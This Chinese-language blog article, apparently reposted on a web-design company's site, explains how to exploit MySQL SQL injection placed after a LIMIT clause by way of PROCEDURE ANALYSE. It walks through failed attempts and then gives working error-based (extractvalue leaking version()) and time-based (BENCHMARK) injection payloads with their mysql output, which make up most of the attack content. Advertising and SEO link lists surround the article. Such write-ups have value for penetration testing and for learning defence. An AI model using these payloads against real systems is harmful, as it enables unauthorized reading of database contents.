Mysql注入点在limit关键字后面的利用方法

描写sql注入利用方法的文章数不胜数,本文将描述一种比较特殊的场景。

成都创新互联长期为上千家客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为克什克腾企业提供专业的成都做网站、网站设计、外贸营销网站建设克什克腾网站改版等技术服务。拥有10余年丰富建站经验和众多成功案例,为您定制开发。

细节

在一次测试中,我碰到了一个sql注入的问题,在网上没有搜到解决办法,当时的注入点是在limit关键字后面,数据库是MySQL5.x,SQL语句类似下面这样:

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

问题的关键在于,语句中有order by 关键字,我们知道,mysql 中在order by 前面可以使用union 关键字,所以如果注入点前面没有order by 关键字,就可以顺利的使用union 关键字,但是现在的情况是,注入点前面有order by 关键字,这个问题在stackoverflow 上和sla.ckers上都有讨论,但是都没有什么有效的解决办法。

我们先看看 mysql 5.x 的文档中的 select 的语法:

 
 
 
 
    
  
  
  
  
  1. SELECT 
    2. 
  
  
  
  
  2. [ALL | DISTINCT | DISTINCTROW ]  
    3. 
  
  
  
  
  3. [HIGH_PRIORITY]  
    4. 
  
  
  
  
  4. [STRAIGHT_JOIN]  
    5. 
  
  
  
  
  5. [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]  
    6. 
  
  
  
  
  6. [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]  
    7. 
  
  
  
  
  7. select_expr [, select_expr ...]  
    8. 
  
  
  
  
  8. [FROM table_references  
    9. 
  
  
  
  
  9. [WHERE where_condition]  
    10. 
  
  
  
  
  10. [GROUP BY {col_name | expr | position}  
    11. 
  
  
  
  
  11. [ASC | DESC], ... [WITH ROLLUP]]
    12. 
  
  
  
  
  12. [HAVING where_condition]  
    13. 
  
  
  
  
  13. [ORDER BY {col_name | expr | position}  
    14. 
  
  
  
  
  14. [ASC | DESC], ...]  
    15. 
  
  
  
  
  15. [LIMIT {[offset,] row_count | row_count OFFSET offset}]  
    16. 
  
  
  
  
  16. [PROCEDURE procedure_name(argument_list)]  
    17. 
  
  
  
  
  17. [INTO OUTFILE 'file_name' export_options  
    18. 
  
  
  
  
  18. | INTO DUMPFILE 'file_name' 
    19. 
  
  
  
  
  19. | INTO var_name [, var_name]]
    20. 
  
  
  
  
  20. [FOR UPDATE | LOCK IN SHARE MODE]]
    21.

limit 关键字后面还有 PROCEDURE 和 INTO 关键字,into 关键字可以用来写文件,但这在本文中不重要,这里的重点是 PROCEDURE 关键字.MySQL默认可用的存储过程只有 ANALYSE (doc)。

尝试用这个存储过程:

 
 
 
 
    
  
  
  
  
  1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1);  
    2. 
  
  
  
  
  2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 
    3. 
  
  
  
  
  3.  
    4.

ANALYSE支持两个参数,试试两个参数:

 
 
 
 
    
  
  
  
  
  1. mysql> SELECT field FROM table where id > 0 ORDER BY id LIMIT 1,1 PROCEDURE ANALYSE(1,1);  
    2. 
  
  
  
  
  2. ERROR 1386 (HY000): Can't use ORDER clause with this procedure 
    3. 
  
  
  
  
  3.  
    4.

依然无效,尝试在 ANALYSE 中插入 sql 语句:

 
 
 
 
    
  
  
  
  
  1. mysql> SELECT field from table where id > 0 order by id LIMIT 1,1 procedure analyse((select IF(MID(version(),1,1) LIKE 5, sleep(5),1)),1);  
    2.

响应如下:

 
 
 
 
    
  
  
  
  
  1. ERROR 1108 (HY000): Incorrect parameters to procedure 'analyse’ 
    2.

事实证明,sleep 没有被执行,最终,我尝试了如下payload :

 
 
 
 
    
  
  
  
  
  1. mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  
    2. 
  
  
  
  
  2. ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 
    3. 
  
  
  
  
  3.  
    4.

啊哈,上面的方法就是常见的报错注入,所以,如果注入点支持报错,那所有问题都ok,但是如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

 
 
 
 
    
  
  
  
  
  1. SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)  
    2.

有意思的是,这里不能用sleep而只能用 BENCHMARK。

另外,这里还有一种类似的方法 https://rdot.org/forum/showpost.php?p=36186&postcount=30

当前文章:Mysql注入点在limit关键字后面的利用方法
网页链接:http://www.mswzjz.cn/qtweb/news36/404036.html

攀枝花网站建设、攀枝花网站运维推广公司-贝锐智能,是专注品牌与效果的网络营销公司;服务项目有等

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 贝锐智能

贝锐智能技术为您推荐以下文章

软件开发知识

行业网站建设

做网站    成都公司注册    重庆服务器托管    成都托管服务器    重庆网络营销    成都网站制作    成都发电机租用    宣传册设计    品牌设计    安卓开发    门户网站建设方案    四川服务器托管    马边网站建设    特丽尔硅藻泥    钢筋机械设备    软文平台    江安网站建设    成都网站SEO优化公司    郫县网站建设    巴中倍辉科技